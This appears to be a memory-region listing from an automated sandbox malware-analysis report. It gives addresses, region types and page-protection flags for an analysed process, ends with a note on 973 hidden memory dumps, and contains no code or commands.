page read and write
2049000
heap
page read and write
400000
system
page execute and read and write
5830000
heap
page read and write
25E0000
heap
page read and write
4C80000
heap
page execute and read and write
3503000
heap
page read and write
536C000
trusted library allocation
page read and write
6FB0000
trusted library allocation
page read and write
382B000
unclassified section
page execute and read and write
9D95000
direct allocation
page execute and read and write
5D69000
heap
page read and write
8B20000
trusted library allocation
page read and write
27F0000
heap
page read and write
670E000
stack
page read and write
471000
unkown
page write copy
27B9000
heap
page read and write
3CBC000
heap
page read and write
27C5000
heap
page read and write
8860000
trusted library allocation
page read and write
7B9000
heap
page read and write
8467000
stack
page read and write
27CE000
heap
page read and write
7AFF000
stack
page read and write
5E10000
remote allocation
page read and write
27CE000
heap
page read and write
4C4000
heap
page read and write
7A9000
heap
page read and write
289000
heap
page read and write
5E4000
heap
page read and write
5D5C000
heap
page read and write
5F70000
heap
page read and write
33FE000
stack
page read and write
65F5000
heap
page execute and read and write
4C4000
heap
page read and write
534C000
trusted library allocation
page read and write
27CB000
heap
page read and write
3140000
trusted library allocation
page read and write
34A4000
heap
page read and write
5F81000
heap
page read and write
3D80000
heap
page read and write
7B00000
trusted library allocation
page read and write
568000
heap
page read and write
284000
heap
page read and write
27CB000
heap
page read and write
84EE000
stack
page read and write
5207000
trusted library allocation
page read and write
8AC000
heap
page read and write
5D2B000
heap
page read and write
7A30000
trusted library allocation
page read and write
27BF000
heap
page read and write
27CB000
heap
page read and write
5837000
heap
page read and write
34A6000
heap
page read and write
1F0000
heap
page read and write
30F3000
trusted library allocation
page execute and read and write
5C3000
heap
page read and write
2BCC000
stack
page read and write
4198000
heap
page read and write
582F000
stack
page read and write
705B000
stack
page read and write
401000
unkown
page execute read
2820000
heap
page read and write
3350000
heap
page read and write
3C05000
heap
page read and write
19C000
stack
page read and write
81E0000
trusted library allocation
page read and write
668D000
stack
page read and write
215C000
heap
page read and write
31C0000
heap
page read and write
7AA0000
trusted library allocation
page execute and read and write
27EE000
heap
page read and write
447C000
trusted library allocation
page read and write
5852000
heap
page read and write
5D7C000
heap
page read and write
4C4000
heap
page read and write
27CE000
heap
page read and write
A20000
heap
page read and write
22D7000
heap
page read and write
68E9000
heap
page read and write
3125000
trusted library allocation
page execute and read and write
4C5000
heap
page read and write
884C000
heap
page read and write
27B1000
heap
page read and write
400000
system
page execute and read and write
471000
unkown
page write copy
41A1000
trusted library allocation
page read and write
5D25000
heap
page read and write
30E0000
trusted library allocation
page read and write
27BF000
heap
page read and write
27B8000
heap
page read and write
2FEB000
stack
page read and write
218A000
heap
page read and write
3516000
heap
page read and write
2591000
heap
page read and write
801000
heap
page read and write
3516000
heap
page read and write
7A50000
trusted library allocation
page read and write
5CD000
heap
page read and write
78E0000
trusted library allocation
page read and write
2170000
heap
page read and write
2E38000
stack
page read and write
337F000
stack
page read and write
6B5F000
stack
page read and write
B195000
direct allocation
page execute and read and write
6CC000
stack
page read and write
345D000
heap
page read and write
80BE000
stack
page read and write
5839000
heap
page read and write
27C4000
heap
page read and write
34D5000
heap
page read and write
5831000
heap
page read and write
27BB000
heap
page read and write
7670000
trusted library allocation
page read and write
27F6000
heap
page read and write
768D000
heap
page read and write
5A0000
heap
page read and write
278A000
trusted library allocation
page execute and read and write
7680000
heap
page read and write
4C5000
heap
page read and write
5838000
heap
page read and write
276D000
trusted library allocation
page execute and read and write
27E6000
heap
page read and write
34FC000
heap
page read and write
51A1000
trusted library allocation
page read and write
3810000
unclassified section
page execute and read and write
5852000
heap
page read and write
117000
stack
page read and write
584E000
heap
page read and write
3428000
heap
page read and write
258D000
heap
page read and write
801000
heap
page read and write
27CE000
heap
page read and write
33A5000
heap
page read and write
3954000
heap
page read and write
5DD8000
heap
page read and write
5DA8000
heap
page read and write
22BF000
stack
page read and write
210000
heap
page read and write
34D5000
heap
page read and write
7A20000
trusted library allocation
page read and write
27BB000
heap
page read and write
27C0000
heap
page read and write
27B1000
heap
page read and write
7CC000
heap
page read and write
7678000
trusted library allocation
page read and write
23DF000
stack
page read and write
1F0000
heap
page read and write
27B1000
heap
page read and write
215C000
heap
page read and write
3190000
heap
page read and write
27D4000
heap
page read and write
2740000
heap
page read and write
3516000
heap
page read and write
5CD000
heap
page read and write
34E0000
heap
page read and write
560000
heap
page read and write
34EA000
heap
page read and write
27B1000
heap
page read and write
27D0000
heap
page read and write
782000
heap
page read and write
5CF6000
trusted library allocation
page read and write
6CDD000
trusted library allocation
page read and write
72D0000
heap
page read and write
25DF000
stack
page read and write
2FDF000
stack
page read and write
4140000
heap
page read and write
77B0000
trusted library allocation
page read and write
2590000
heap
page read and write
5E4000
heap
page read and write
286000
heap
page read and write
48F000
heap
page read and write
27CB000
heap
page read and write
2770000
heap
page read and write
5DA8000
heap
page read and write
7A00000
trusted library allocation
page read and write
817000
heap
page read and write
A2D000
heap
page read and write
27D4000
heap
page read and write
3958000
heap
page read and write
24DF000
stack
page read and write
7ADB000
stack
page read and write
27F0000
heap
page read and write
77C0000
trusted library allocation
page read and write
8A90000
direct allocation
page execute and read and write
27CB000
heap
page read and write
471000
unkown
page write copy
33A0000
heap
page read and write
5D0A000
heap
page read and write
5D66000
heap
page read and write
177000
stack
page read and write
760000
heap
page read and write
27B4000
heap
page read and write
5C91000
trusted library allocation
page read and write
27CE000
heap
page read and write
4538000
trusted library allocation
page read and write
471000
unkown
page write copy
27B8000
heap
page read and write
6E20000
trusted library allocation
page read and write
478000
heap
page read and write
5836000
heap
page read and write
5E10000
remote allocation
page read and write
2779000
trusted library allocation
page read and write
27D0000
heap
page read and write
3CBC000
heap
page read and write
240000
heap
page read and write
21A000
heap
page read and write
10016000
direct allocation
page execute and read and write
2DC0000
unclassified section
page execute and read and write
9C000
stack
page read and write
7C4000
heap
page read and write
27BE000
heap
page read and write
4C4000
heap
page read and write
3478000
heap
page read and write
38A0000
heap
page read and write
1E0000
heap
page read and write
2ACE000
stack
page read and write
68D0000
heap
page read and write
2763000
trusted library allocation
page execute and read and write
2FB000
heap
page read and write
5F93000
heap
page read and write
27D4000
heap
page read and write
548F000
trusted library allocation
page read and write
2181000
heap
page read and write
4B00000
trusted library allocation
page execute and read and write
2764000
trusted library allocation
page read and write
68E0000
heap
page read and write
2175000
heap
page read and write
69E000
stack
page read and write
2140000
heap
page read and write
6DCB000
heap
page read and write
351E000
heap
page read and write
3110000
trusted library allocation
page read and write
8680000
trusted library allocation
page read and write
3B98000
heap
page read and write
21D2000
heap
page read and write
7BF000
stack
page read and write
27A0000
heap
page read and write
7AB0000
heap
page read and write
852E000
stack
page read and write
84A0000
trusted library allocation
page read and write
11D000
stack
page read and write
6F90000
trusted library allocation
page read and write
6D0D000
heap
page read and write
2710000
heap
page read and write
6E00000
trusted library allocation
page read and write
7A9000
heap
page read and write
34BB000
heap
page read and write
5E4000
heap
page read and write
400000
unkown
page readonly
7B4000
heap
page read and write
24C000
heap
page read and write
5842000
heap
page read and write
27B1000
heap
page read and write
5CB9000
trusted library allocation
page read and write
7A9000
heap
page read and write
34DD000
heap
page read and write
27EE000
heap
page read and write
351C000
heap
page read and write
640000
heap
page read and write
85E0000
trusted library allocation
page read and write
2161000
heap
page read and write
5E4000
heap
page read and write
34A5000
heap
page read and write
45D000
system
page execute and read and write
793000
heap
page read and write
2BCF000
stack
page read and write
79AE000
stack
page read and write
2175000
heap
page read and write
5D1E000
heap
page read and write
3956000
heap
page read and write
27CE000
heap
page read and write
456000
system
page execute and read and write
27BE000
heap
page read and write
2795000
trusted library allocation
page execute and read and write
3D50000
heap
page read and write
27E7000
heap
page read and write
6B1E000
stack
page read and write
27B9000
heap
page read and write
7E2000
heap
page read and write
9C000
stack
page read and write
7DC000
heap
page read and write
5D68000
heap
page read and write
5D49000
heap
page read and write
27D4000
heap
page read and write
4C4000
heap
page read and write
27CE000
heap
page read and write
8810000
heap
page read and write
34F9000
heap
page read and write
2E33000
unclassified section
page execute and read and write
2E80000
heap
page read and write
34D4000
heap
page read and write
5CF0000
heap
page read and write
27BB000
heap
page read and write
2130000
heap
page read and write
680E000
stack
page read and write
8830000
heap
page read and write
34D4000
heap
page read and write
5E4000
heap
page read and write
782000
heap
page read and write
3504000
heap
page read and write
27CE000
heap
page read and write
327D000
stack
page read and write
311A000
trusted library allocation
page execute and read and write
401E000
stack
page read and write
9C000
stack
page read and write
2B4000
heap
page read and write
2792000
trusted library allocation
page read and write
5E0000
heap
page read and write
27E9000
heap
page read and write
27BE000
heap
page read and write
7850000
trusted library allocation
page read and write
34AC000
heap
page read and write
27B1000
heap
page read and write
27AA000
heap
page read and write
4B20000
heap
page read and write
3600000
heap
page read and write
27D4000
heap
page read and write
27B9000
heap
page read and write
4C5000
heap
page read and write
3954000
heap
page read and write
3450000
heap
page read and write
8A0000
heap
page read and write
27BE000
unkown
page read and write
34A7000
heap
page read and write
766000
heap
page read and write
5D17000
heap
page read and write
27FF000
heap
page read and write
27E9000
heap
page read and write
394E000
stack
page read and write
33B0000
heap
page read and write
7150000
direct allocation
page read and write
2150000
heap
page read and write
5852000
heap
page read and write
7A10000
trusted library allocation
page read and write
27BA000
heap
page read and write
42F9000
trusted library allocation
page read and write
801000
heap
page read and write
400000
system
page execute and read and write
27CE000
heap
page read and write
760000
heap
page read and write
5CFF000
trusted library allocation
page read and write
548D000
trusted library allocation
page read and write
27CB000
heap
page read and write
7E2000
heap
page read and write
2174000
heap
page read and write
7DC000
heap
page read and write
34AD000
heap
page read and write
7010000
trusted library allocation
page read and write
27BD000
heap
page read and write
34E6000
heap
page read and write
29B0000
trusted library allocation
page read and write
27BE000
heap
page read and write
27F7000
heap
page read and write
27CE000
heap
page read and write
4C4000
heap
page read and write
27BE000
heap
page read and write
34F2000
heap
page read and write
5839000
heap
page read and write
34F7000
heap
page read and write
7DBE000
stack
page read and write
478000
unkown
page readonly
34C4000
heap
page read and write
5852000
heap
page read and write
39B0000
heap
page read and write
5839000
heap
page read and write
7830000
trusted library allocation
page read and write
27CE000
heap
page read and write
34BC000
heap
page read and write
6EFE000
stack
page read and write
27BE000
heap
page read and write
27D4000
heap
page read and write
22D0000
heap
page read and write
448F000
trusted library allocation
page read and write
5852000
heap
page read and write
5845000
heap
page read and write
27D0000
heap
page read and write
27C3000
heap
page read and write
5DD8000
heap
page read and write
7A90000
trusted library allocation
page read and write
627F000
stack
page read and write
193000
stack
page read and write
5E4000
heap
page read and write
3BC9000
heap
page read and write
5831000
heap
page read and write
6E30000
heap
page execute and read and write
349B000
heap
page read and write
454E000
trusted library allocation
page read and write
72E0000
heap
page read and write
8560000
trusted library allocation
page execute and read and write
27B1000
heap
page read and write
6C90000
trusted library allocation
page read and write
751E000
stack
page read and write
30C0000
trusted library section
page read and write
4DE9000
trusted library allocation
page read and write
A2D000
heap
page read and write
2740000
trusted library section
page read and write
60E000
stack
page read and write
3880000
heap
page read and write
27EA000
heap
page read and write
27E9000
heap
page read and write
57C000
heap
page read and write
27CB000
heap
page read and write
318A000
heap
page read and write
8570000
trusted library allocation
page read and write
1F9E000
stack
page read and write
688000
heap
page read and write
21D2000
heap
page read and write
5D24000
heap
page read and write
30F4000
trusted library allocation
page read and write
27CB000
heap
page read and write
8580000
trusted library allocation
page read and write
70F0000
heap
page execute and read and write
349C000
heap
page read and write
6CF0000
heap
page read and write
DC000
stack
page read and write
27CB000
heap
page read and write
3150000
heap
page readonly
793000
heap
page read and write
7A70000
trusted library allocation
page read and write
793000
heap
page read and write
27CE000
heap
page read and write
27B9000
heap
page read and write
215F000
heap
page read and write
27BB000
heap
page read and write
8590000
trusted library allocation
page read and write
27CE000
heap
page read and write
27EE000
heap
page read and write
7A9000
heap
page read and write
7A9000
heap
page read and write
3516000
heap
page read and write
7F030000
trusted library allocation
page execute and read and write
2580000
heap
page read and write
3516000
heap
page read and write
596D000
stack
page read and write
34F0000
heap
page read and write
583E000
heap
page read and write
3B51000
heap
page read and write
7820000
heap
page execute and read and write
7706000
heap
page read and write
27CE000
heap
page read and write
3900000
heap
page read and write
29B0000
trusted library allocation
page read and write
478000
unkown
page readonly
27CE000
heap
page read and write
4C5000
heap
page read and write
7840000
trusted library allocation
page execute and read and write
2E1D000
unclassified section
page execute and read and write
2760000
trusted library allocation
page read and write
830000
heap
page read and write
6EBF000
stack
page read and write
5BAD000
stack
page read and write
27CE000
heap
page read and write
27CE000
heap
page read and write
349B000
heap
page read and write
2741000
heap
page read and write
5E4000
heap
page read and write
41FE000
trusted library allocation
page read and write
401000
unkown
page execute read
4901000
trusted library allocation
page read and write
3B98000
heap
page read and write
29B0000
trusted library allocation
page read and write
813C000
stack
page read and write
27E1000
heap
page read and write
817000
heap
page read and write
2F97000
heap
page read and write
3C43000
heap
page read and write
2770000
trusted library allocation
page read and write
766000
heap
page read and write
7B4000
heap
page read and write
457E000
trusted library allocation
page read and write
34D4000
heap
page read and write
459000
system
page execute and read and write
19C000
stack
page read and write
6FA0000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
3FA8000
trusted library allocation
page read and write
6E7E000
stack
page read and write
27CE000
heap
page read and write
80FE000
stack
page read and write
448B000
trusted library allocation
page read and write
25AF000
stack
page read and write
27B1000
heap
page read and write
5D25000
heap
page read and write
6CD0000
trusted library allocation
page read and write
27CE000
heap
page read and write
34A7000
heap
page read and write
6E08000
trusted library allocation
page read and write
1C0000
heap
page read and write
7FBC0000
trusted library allocation
page execute and read and write
776F000
heap
page read and write
490000
heap
page read and write
570000
heap
page read and write
782000
heap
page read and write
584D000
heap
page read and write
2F90000
heap
page read and write
817000
heap
page read and write
27CB000
heap
page read and write
3503000
heap
page read and write
2DA0000
heap
page read and write
2150000
heap
page read and write
27C4000
heap
page read and write
3513000
heap
page read and write
36EE000
stack
page read and write
34D8000
heap
page read and write
27BA000
heap
page read and write
4B28000
heap
page read and write
3516000
heap
page read and write
5831000
heap
page read and write
27CE000
heap
page read and write
470000
heap
page read and write
27CB000
heap
page read and write
3B50000
heap
page read and write
29B0000
trusted library allocation
page read and write
37FF000
unkown
page read and write
7E2000
heap
page read and write
6CC0000
trusted library allocation
page read and write
81D0000
trusted library allocation
page read and write
48A7000
trusted library allocation
page read and write
4474000
trusted library allocation
page read and write
5CFB000
heap
page read and write
2161000
heap
page read and write
31CD000
heap
page read and write
820000
heap
page read and write
5E4000
heap
page read and write
4190000
heap
page read and write
17C000
stack
page read and write
8881000
heap
page read and write
2809000
heap
page read and write
26FD000
stack
page read and write
209F000
stack
page read and write
3221000
heap
page read and write
27CE000
heap
page read and write
27CB000
heap
page read and write
27CF000
heap
page read and write
339E000
stack
page read and write
455B000
trusted library allocation
page read and write
34A7000
heap
page read and write
2178000
heap
page read and write
760000
heap
page read and write
301F000
stack
page read and write
85F0000
heap
page read and write
405E000
stack
page read and write
27BA000
heap
page read and write
4C4000
heap
page read and write
395A000
heap
page read and write
2169000
heap
page read and write
190000
heap
page read and write
38FF000
stack
page read and write
9395000
direct allocation
page execute and read and write
4C5000
heap
page read and write
77BB000
trusted library allocation
page read and write
5477000
trusted library allocation
page read and write
4913000
trusted library allocation
page read and write
3FD0000
heap
page execute and read and write
4C4000
heap
page read and write
2D16000
heap
page read and write
2161000
heap
page read and write
2750000
trusted library allocation
page read and write
30B000
heap
page read and write
5FD5000
heap
page read and write
7A9000
heap
page read and write
8AC000
heap
page read and write
7E0000
heap
page read and write
5D58000
heap
page read and write
2180000
heap
page read and write
27BA000
heap
page read and write
793000
heap
page read and write
4C0000
heap
page read and write
27E1000
heap
page read and write
3168000
trusted library allocation
page read and write
27EE000
heap
page read and write
27D2000
heap
page read and write
27B1000
heap
page read and write
782000
heap
page read and write
34AD000
heap
page read and write
674E000
stack
page read and write
263E000
stack
page read and write
470000
heap
page read and write
5832000
heap
page read and write
45C000
system
page execute and read and write
27D1000
heap
page read and write
48F4000
trusted library allocation
page read and write
81E000
stack
page read and write
2F60000
heap
page read and write
550000
heap
page read and write
2581000
heap
page read and write
7E0000
heap
page read and write
27B0000
heap
page read and write
678E000
stack
page read and write
27B8000
heap
page read and write
27EB000
heap
page read and write
34DE000
heap
page read and write
7C4000
heap
page read and write
7140000
direct allocation
page read and write
27D1000
heap
page read and write
720000
heap
page read and write
7A20000
trusted library allocation
page read and write
27BB000
heap
page read and write
2175000
heap
page read and write
8635000
trusted library allocation
page read and write
401000
unkown
page execute read
610000
trusted library allocation
page read and write
401000
unkown
page execute read
400000
unkown
page readonly
560000
heap
page read and write
584A000
heap
page read and write
7790000
trusted library allocation
page read and write
7A9000
heap
page read and write
27CE000
heap
page read and write
37EE000
stack
page read and write
5852000
heap
page read and write
2171000
heap
page read and write
400000
unkown
page readonly
7C7000
heap
page read and write
5FBF000
heap
page read and write
34D4000
heap
page read and write
5D28000
heap
page read and write
620000
trusted library allocation
page read and write
3503000
heap
page read and write
68F0000
heap
page read and write
782000
heap
page read and write
27B8000
heap
page read and write
760000
heap
page read and write
6B82000
heap
page read and write
5E4000
heap
page read and write
478000
unkown
page readonly
4C5000
heap
page read and write
32FB000
stack
page read and write
2750000
heap
page read and write
35C0000
heap
page read and write
5D04000
trusted library allocation
page read and write
215C000
heap
page read and write
27B8000
heap
page read and write
4A6E000
stack
page read and write
4C5000
heap
page read and write
5F6F000
stack
page read and write
5852000
heap
page read and write
5D40000
heap
page read and write
3C06000
heap
page read and write
7CC000
heap
page read and write
337D000
stack
page read and write
219D000
heap
page read and write
41B000
system
page execute and read and write
27E9000
heap
page read and write
41A5000
trusted library allocation
page read and write
79F0000
heap
page read and write
5FD8000
heap
page read and write
4C4000
heap
page read and write
7A1000
heap
page read and write
27D1000
heap
page read and write
27C4000
heap
page read and write
27B9000
heap
page read and write
3516000
heap
page read and write
27BE000
heap
page read and write
3950000
heap
page read and write
817C000
stack
page read and write
6FC0000
trusted library allocation
page read and write
5E4000
heap
page read and write
27D0000
heap
page readonly
478000
unkown
page readonly
215C000
heap
page read and write
3450000
heap
page read and write
5831000
heap
page read and write
34F5000
heap
page read and write
400000
unkown
page readonly
27CB000
heap
page read and write
There are 973 hidden memdumps, click here to show them.